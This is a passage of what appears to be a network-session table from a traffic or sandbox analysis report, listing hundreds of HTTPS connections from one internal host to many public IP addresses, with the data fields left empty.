                                                11519192.168.2.234154881.89.4.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11520192.168.2.2356724102.211.154.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11521192.168.2.2357710173.0.200.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11522192.168.2.233513212.145.242.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11523192.168.2.2335180201.237.225.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11524192.168.2.2355000111.242.237.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11525192.168.2.2339604193.146.0.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11526192.168.2.2337314176.156.41.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11527192.168.2.2350178210.206.6.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11528192.168.2.2349620159.53.135.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11529192.168.2.2350970186.117.203.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11530192.168.2.233686263.144.190.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11531192.168.2.233279875.249.176.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11532192.168.2.2336174168.189.154.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11533192.168.2.2342314141.43.43.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11534192.168.2.234564438.227.232.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11535192.168.2.2359646138.78.142.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11536192.168.2.2341800200.60.174.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11537192.168.2.2343076203.217.89.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11538192.168.2.233661264.212.8.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11539192.168.2.2335672210.57.129.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11540192.168.2.235294852.152.193.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11541192.168.2.2358602177.145.153.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11542192.168.2.2338344221.152.136.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11543192.168.2.233777496.137.209.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11544192.168.2.234040683.18.132.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11545192.168.2.233669858.191.71.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11546192.168.2.234161086.238.186.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11547192.168.2.2332994174.165.38.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11548192.168.2.2341816213.79.101.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11549192.168.2.2337464160.150.51.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11550192.168.2.236051893.131.15.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11551192.168.2.234343632.246.149.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11552192.168.2.233281877.60.89.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11553192.168.2.2354120132.240.74.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11554192.168.2.2340878216.99.233.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11555192.168.2.234137042.212.204.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11556192.168.2.236060496.38.58.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11557192.168.2.2341650113.250.117.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11558192.168.2.2337504171.182.133.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11559192.168.2.2333566105.197.149.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11560192.168.2.2360364208.209.202.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11561192.168.2.2351920139.188.87.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11562192.168.2.2348776116.119.81.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11563192.168.2.2343384124.20.106.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11564192.168.2.2333738136.244.203.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11565192.168.2.2342338221.30.189.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11566192.168.2.235529099.85.140.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11567192.168.2.2358516146.220.92.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11568192.168.2.2332930102.38.85.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11569192.168.2.2346448223.107.139.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11570192.168.2.234040853.118.209.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11571192.168.2.2345606133.107.10.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11572192.168.2.2334530189.178.34.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11573192.168.2.2338094206.114.67.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11574192.168.2.2359042157.189.60.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11575192.168.2.2334776125.148.48.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11576192.168.2.2353206203.106.104.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11577192.168.2.2353216206.104.10.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11578192.168.2.235365651.147.207.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11579192.168.2.235365649.232.109.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11580192.168.2.2350424182.255.225.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11581192.168.2.234737036.30.80.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11582192.168.2.2350570187.58.145.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11583192.168.2.234928877.211.129.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11584192.168.2.23566224.106.250.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11585192.168.2.2358070130.205.181.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11586192.168.2.235688844.245.173.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11587192.168.2.2354108149.141.181.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11588192.168.2.2336430137.157.85.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11589192.168.2.235581032.151.245.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11590192.168.2.235027447.63.98.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11591192.168.2.2343808134.32.125.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11592192.168.2.2333602126.244.224.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11593192.168.2.235034472.64.186.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11594192.168.2.234575064.196.58.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11595192.168.2.23609105.139.140.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11596192.168.2.2344126221.83.126.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11597192.168.2.2354640191.242.171.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11598192.168.2.234126097.85.174.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11599192.168.2.2333270132.169.172.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11600192.168.2.2358366151.204.172.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11601192.168.2.2352728113.145.31.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11602192.168.2.235600220.66.76.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11603192.168.2.233698625.132.21.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11604192.168.2.2339302129.53.106.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11605192.168.2.2351748134.64.216.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11606192.168.2.2350722137.192.24.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11607192.168.2.2357474149.77.14.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11608192.168.2.234780481.126.58.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11609192.168.2.236025674.109.209.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11610192.168.2.2334484206.56.113.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11611192.168.2.235783695.201.42.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11612192.168.2.2334546132.56.32.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11613192.168.2.236089658.76.201.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11614192.168.2.2336328144.28.185.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11615192.168.2.2344244143.206.242.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11616192.168.2.2350486159.5.229.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11617192.168.2.2345722134.41.110.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11618192.168.2.2358648222.78.29.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11619192.168.2.234198054.224.42.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11620192.168.2.2337862183.89.203.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11621192.168.2.2333894122.68.108.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11622192.168.2.2350552201.106.21.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11623192.168.2.2347066211.177.151.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11624192.168.2.2355442132.191.127.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11625192.168.2.233433047.120.91.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11626192.168.2.2341118209.169.115.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11627192.168.2.2335394154.40.92.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11628192.168.2.2358152172.192.214.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11629192.168.2.23478322.93.94.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11630192.168.2.235002032.171.1.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11631192.168.2.2342224146.223.196.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11632192.168.2.2347122145.13.58.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11633192.168.2.235059036.40.71.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11634192.168.2.234835269.37.137.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11635192.168.2.2333266121.132.121.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11636192.168.2.2359614220.199.74.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11637192.168.2.233879665.213.164.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11638192.168.2.235106085.58.60.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11639192.168.2.2359946202.55.162.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11640192.168.2.23427009.238.255.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11641192.168.2.23442182.120.207.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11642192.168.2.235705078.6.65.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11643192.168.2.235078823.231.94.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11644192.168.2.234341899.86.19.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11645192.168.2.2338106146.211.134.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11646192.168.2.2354490111.175.95.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11647192.168.2.2359608144.16.224.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11648192.168.2.2352786107.42.175.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11649192.168.2.235133095.150.149.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11650192.168.2.2352462208.2.126.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11651192.168.2.2340932122.191.228.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11652192.168.2.2344238207.193.72.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11653192.168.2.235430849.116.9.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11654192.168.2.235951046.241.64.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11655192.168.2.233297882.8.113.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11656192.168.2.2349504174.15.80.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11657192.168.2.235383288.151.158.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11658192.168.2.235915895.148.99.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11659192.168.2.233518620.222.86.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11660192.168.2.2356660213.35.27.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11661192.168.2.2338554176.185.204.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11662192.168.2.2345962179.32.162.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11663192.168.2.2353758181.12.215.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11664192.168.2.2333950147.78.255.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11665192.168.2.2342518213.17.155.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11666192.168.2.233560838.159.54.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11667192.168.2.2354754126.206.155.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11668192.168.2.2348694172.207.140.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11669192.168.2.233634872.90.175.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11670192.168.2.2337294169.222.207.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11671192.168.2.2343756156.229.184.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11672192.168.2.234763669.21.196.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11673192.168.2.2351446175.1.65.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11674192.168.2.2341718155.213.236.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11675192.168.2.2345348223.128.144.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11676192.168.2.2346046221.22.74.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11677192.168.2.2341218139.152.239.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11678192.168.2.236089241.181.6.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11679192.168.2.2346970128.211.15.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11680192.168.2.234527024.178.172.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11681192.168.2.234098488.252.8.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11682192.168.2.2349268217.89.124.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11683192.168.2.235063468.81.32.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11684192.168.2.2343060174.43.121.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11685192.168.2.235646837.221.245.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11686192.168.2.2357758126.191.144.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11687192.168.2.2358406183.177.118.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11688192.168.2.234414851.237.85.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11689192.168.2.2335710143.69.28.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11690192.168.2.2350748194.144.223.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11691192.168.2.2340272213.66.161.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11692192.168.2.23562481.91.207.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11693192.168.2.2356802125.238.154.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11694192.168.2.2333830103.139.224.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11695192.168.2.2355938114.16.102.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11696192.168.2.2348518118.120.240.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11697192.168.2.2357824155.143.76.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11698192.168.2.235915063.159.183.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11699192.168.2.235015096.7.193.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11700192.168.2.2350318207.31.56.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11701192.168.2.2337252121.242.174.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11702192.168.2.235468854.50.13.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11703192.168.2.233933693.121.116.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11704192.168.2.2338848207.84.137.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11705192.168.2.2334898118.195.195.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11706192.168.2.2342482104.70.127.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11707192.168.2.2341806199.219.99.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11708192.168.2.2342418147.167.56.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11709192.168.2.2349564161.25.93.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11710192.168.2.2344432210.99.50.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11711192.168.2.2357004175.80.119.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11712192.168.2.233997499.29.236.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11713192.168.2.2353142183.48.102.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11714192.168.2.234595058.17.79.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11715192.168.2.233963267.50.125.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11716192.168.2.23574224.88.23.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11717192.168.2.23534489.113.70.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11718192.168.2.2350016118.58.74.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11719192.168.2.2335054176.68.174.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11720192.168.2.2335478105.178.231.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11721192.168.2.2337010195.212.0.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11722192.168.2.2347546157.111.184.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11723192.168.2.2345400112.236.229.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11724192.168.2.2349230206.128.178.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11725192.168.2.2337124176.168.95.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11726192.168.2.233310643.6.89.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11727192.168.2.234529054.235.95.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11728192.168.2.2344848134.238.245.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11729192.168.2.233323881.62.221.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11730192.168.2.235074845.195.193.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11731192.168.2.2355402206.156.73.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11732192.168.2.2359446205.252.16.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11733192.168.2.2348102213.54.43.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11734192.168.2.2352704146.189.173.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11735192.168.2.2342868198.193.181.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11736192.168.2.2360478159.25.112.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11737192.168.2.2346298161.98.34.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11738192.168.2.234746672.4.202.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11739192.168.2.2356366203.216.122.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11740192.168.2.2338410187.36.116.175443
                                                TimestampBytes transferredDirectionData


